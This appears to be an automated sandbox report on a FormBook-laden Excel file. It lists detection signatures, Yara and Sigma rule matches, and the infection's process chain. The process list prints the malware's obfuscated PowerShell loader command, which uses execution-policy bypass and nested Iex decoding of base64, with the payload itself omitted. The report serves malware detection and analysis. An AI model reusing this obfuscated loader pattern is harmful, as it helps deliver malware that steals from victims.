Windows
Analysis Report
PI#0034250924.xla.xlsx
Overview
General Information
Detection
FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for dropped file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
Allocates memory in foreign processes
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 3188, cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, MD5: D53B85E21886D2AF9815C377537BCAC3)
- mshta.exe (PID: 3496, cmdline: C:\Windows\System32\mshta.exe -Embedding, MD5: 95828D670CFD3B16EE188168E083C3C5)
- cmd.exe (PID: 3608, cmdline: "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'[base64 payload omitted]'+[ChAr]34+'))')))", MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
- powershell.exe (PID: 3632, cmdline: pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'[base64 payload omitted]'+[ChAr]34+'))'))), MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- csc.exe (PID: 3752, cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline", MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
- cvtres.exe (PID: 3760, cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8B5.tmp" "c:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP", MD5: C877CBB966EA5939AA2A17B6A5160950)
- wscript.exe (PID: 3852, cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs", MD5: 045451FA238A75305CC26AC982472367)
- temp_exec.exe (PID: 3920, cmdline: "C:\Users\user\AppData\Local\Temp\temp_exec.exe", MD5: 77733FB5B16FC7AE0944C92FD2E89D7E)
- aspnet_compiler.exe (PID: 3948, cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", MD5: A1CC6D0A95AA5C113FA52BEA08847010)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. | | | |
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| Windows_Trojan_Formbook_1112e116 | unknown | unknown | |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| Windows_Trojan_Formbook_1112e116 | unknown | unknown | |
System Summary | |
---|---|
Source: | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) |
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton |
Source: | Author: Michael Haag |